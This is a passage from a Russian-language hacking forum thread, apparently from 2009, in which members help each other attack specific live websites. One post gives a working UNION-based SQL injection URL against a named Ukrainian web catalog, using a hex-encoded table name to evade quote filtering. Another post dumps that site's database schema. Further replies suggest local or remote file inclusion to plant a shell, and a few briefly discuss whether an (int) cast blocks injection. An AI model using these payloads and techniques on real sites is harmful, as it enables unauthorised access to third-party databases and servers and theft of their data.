Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    так там всего 3 поля, откуда ты 17 то взял?
    Вот в виде table_schema,table_name,column_name:
    Code:
    webkat_baze:0links:id
    webkat_baze:0links:name
    webkat_baze:0links:text
    webkat_baze:0links:url
    webkat_baze:0links:date1
    webkat_baze:0links:date2
    webkat_baze:kat:id
    webkat_baze:kat:name
    webkat_baze:links_partner:date
    webkat_baze:links_partner:links
    webkat_baze:links_partner:id
    webkat_baze:site:id
    webkat_baze:site:kat
    webkat_baze:site:subkat
    webkat_baze:site:url
    webkat_baze:site:name
    webkat_baze:site:info
    webkat_baze:site:keywords
    webkat_baze:site:status
    webkat_baze:site:date
    webkat_baze:site:date2
    webkat_baze:site:iphost
    webkat_baze:site:view
    webkat_baze:site:user
    webkat_baze:site:email
    webkat_baze:site:nashbutton
    webkat_baze:site:ocenka
    webkat_baze:site:tmp2
    webkat_baze:subkat:id
    webkat_baze:subkat:kat
    webkat_baze:subkat:name
    
     
    #7721 M.W.N.N., 22 Jun 2009
    Last edited: 22 Jun 2009
  2. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1%20union%20select+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17%20from%20information_schema.columns+where+table_name=0x555345525f50524956494c45474553+--&page=1
     
  3. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    M.W.N.N., я тоже сначала так считал, но при 3-х полях мне не выводился принтабельный столбец!
     
  4. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Все там отлично выводится, принтабельное поле после слов: Каталог > Авто/мото >

    Смотри выше, я выложил в пред идущем посте таблицы и колонки
     
    #7724 M.W.N.N., 22 Jun 2009
    Last edited: 22 Jun 2009
  5. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    M.W.N.N., можешь рассказать, как ты такую таблицу вывел, пожалуйста)
     
  6. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Через дампер
     
  7. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    Krist_ALL, может и тупой вопрос, но всё же, почему же тогда запрос http://www.webkatalog.kiev.ua/section.php?kat=1&subkat=-1+union+select+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+table_name=%27user%27+--
    не катит?)
     
  8. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    393
    Likes Received:
    694
    Reputations:
    405
    нет там таблицы user, и в любом случае при таком методе имя таблицы переводи в HEX, когда кавычки фильтруются.
     
  9. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    436
    Likes Received:
    193
    Reputations:
    24
    Чтобы руками не перебирать все, юзаем sipt. но КТО НЕ ЗНАЕТ КАК СДЕЛАТЬ РУКАМИ ИНЕКЦИЮ НЕ ЮЗАЙТЕ СИПТ! Если что-то делать, так с умом.
     
  10. o314um

    o314um Member

    Joined:
    16 Nov 2006
    Messages:
    227
    Likes Received:
    89
    Reputations:
    7
    там есть табла юзер =) Но да, кавычки фильтруются - нужно хексить или чарить =)
    а сипт ненуюно юзать - там 5 версия, всё и атк просто ;)
     
  11. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    __http://www.xakep.ru/post/45088/default.asp


    народ ..тут видео как чел нашел багу в SMF 1.1.4, он использует прогу Odysseus не подскажите в чем у меня косяк , когдая вроде делаю все тоже самое тока у меня почему то не вылезают те ошибки которые у него ??

    P.S. мб я скачал уже пропатченную версию?, хотя код вроде тот же самый что и у него......юзаю оперу

    Code:
    // Let's not depend on the ini settings... why even have COOKIE in there, anyway?
    	$_REQUEST = $_POST + $_GET;
    
    	// Make sure $board and $topic are numbers.
    	if (isset($_REQUEST['board']))
    	{
    		// Make sure that its a string and not something else like an array
    		$_REQUEST['board'] = (string) $_REQUEST['board'];
    
    		// If there's a slash in it, we've got a start value! (old, compatible links.)
    		if (strpos($_REQUEST['board'], '/') !== false)
    			list ($_REQUEST['board'], $_REQUEST['start']) = explode('/', $_REQUEST['board']);
    		// Same idea, but dots.  This is the currently used format - ?board=1.0...
    		elseif (strpos($_REQUEST['board'], '.') !== false)
    			list ($_REQUEST['board'], $_REQUEST['start']) = explode('.', $_REQUEST['board']);
    		// Now make absolutely sure it's a number.
    		$board = (int) $_REQUEST['board'];
    
    		// This is for "Who's Online" because it might come via POST - and it should be an int here.
    		$_GET['board'] = $board;
    	}
    	// Well, $board is going to be a number no matter what.
    	else
    		$board = 0;
    
    	// If there's a threadid, it's probably an old YaBB SE link.  Flow with it.
    	if (isset($_REQUEST['threadid']) && !isset($_REQUEST['topic']))
    		$_REQUEST['topic'] = $_REQUEST['threadid'];
    
    	// We've got topic!
    	if (isset($_REQUEST['topic']))
    	{
    		// Make sure that its a string and not something else like an array
    		$_REQUEST['topic'] = (string)$_REQUEST['topic'];
    		
    		// Slash means old, beta style, formatting.  That's okay though, the link should still work.
    		if (strpos($_REQUEST['topic'], '/') !== false)
    			list ($_REQUEST['topic'], $_REQUEST['start']) = explode('/', $_REQUEST['topic']);
    		// Dots are useful and fun ;).  This is ?topic=1.15.
    		elseif (strpos($_REQUEST['topic'], '.') !== false)
    			list ($_REQUEST['topic'], $_REQUEST['start']) = explode('.', $_REQUEST['topic']);
    
    		$topic = (int) $_REQUEST['topic'];
    
    		// Now make sure the online log gets the right number.
    		$_GET['topic'] = $topic;
    	}
    
    если что прога вот

    __http://komm.gaz.ru/doka/doc/online/XAKER/Xaker01_2009_dvd/files/soft/Windows/Security/Odysseus%202.0.0.84/Odysseus-2-0-0-84.exe
     
    _________________________
    #7731 HAXTA4OK, 23 Jun 2009
    Last edited: 23 Jun 2009
  12. Devoldini

    Devoldini Elder - Старейшина

    Joined:
    28 Jun 2008
    Messages:
    18
    Likes Received:
    5
    Reputations:
    -6
    При добавлении кавычки ' (/index.php?page=19') вылитает такая ошибка:

    Code:
    Warning: require(.dat) [function.require]: failed to open stream: No such file or directory in /home/host.ru/public_html/index.php on line 46
    
    Fatal error: require() [function.require]: Failed opening required '.dat' (include_path='.:/usr/lib/php') in /home/host.ru/public_html/index.php on line 46
    Я в скуль иньекциях ток пытаюсь разобратся, подскажите что в данном случае можно сделать?
     
  13. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    305
    Likes Received:
    92
    Reputations:
    33
    в данном случае это не sql-inj а php инклуд.
    т.е. вы можете попробовать поинклудить (просмотреть) файл на сервере (LFI) либо можете проинклудить шелл с удаленного сервера (RFI)

    доп.информацию можете почитать в соседних топиках, там всё это есть.
     
  14. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    Нету там помойму нече. Просто при подстановке некоторых символов оно выводит ошибку.
     
  15. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    438
    Likes Received:
    164
    Reputations:
    -19
    Является ли такой запрос опасным? (в плане sql-inj)

    "SELECT ... WHERE `id` = '".(int)$_GET['id']."'"

    Если да то как примерно все это реализовывается? (там же токо число выводят, если get запрос будет таким id=9999+union+... то наврятли что-то выполнится(sql))
     
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605

    нет так как стоит (int )
     
    _________________________
  17. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Но в плане раскрытия путей может быть опасно, т.к. не предотрващает отрицательного значения данных, хотя я скорее всего неправ, и даже наверняка, думаю поправят, если что:)
     
    1 person likes this.
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    :) врятли там получится раскрытие путей ))так как Int значение может иметь и отрицательное и положительное (вроде так))))..а если в плане и раскроется путь, то без SQL-inj и mysql.user с MQ=off и f_p = Y и папкой на запись))) смысла ни какого))...будет смысл если тока есть все это на другом сайте с одним IP :) то можно будет попробовать использовать этот путь с подстановкой того сайта :)

    P.S если не прав тоже поправте :)
     
    _________________________
    #7738 HAXTA4OK, 26 Jun 2009
    Last edited: 26 Jun 2009
  19. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    464
    Likes Received:
    139
    Reputations:
    25
    Не обязательно на одном IP, и что вы все надеетесь на SQL-inj и mysql.user с MQ=off и f_p = Y есть куча других моментов где могут пригодиться пути при заливке шелла, и при выводе ошибок вполне возможно раскрытия пути при не верном SQL запросе или например без проверки на то что вернул запрос и обработка их соотвествуюшими функциями(mysql_fetch_array и etc.) которые могу сгенерировать ошибку.
     
  20. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    942
    Likes Received:
    817
    Reputations:
    605
    если ты понял что ты сам написал то пример в студию

    P.S. прочти на какой вопрос был дан ответ , умник
     
    _________________________
    #7740 HAXTA4OK, 26 Jun 2009
    Last edited: 26 Jun 2009
Loading...
Thread Status:
Not open for further replies.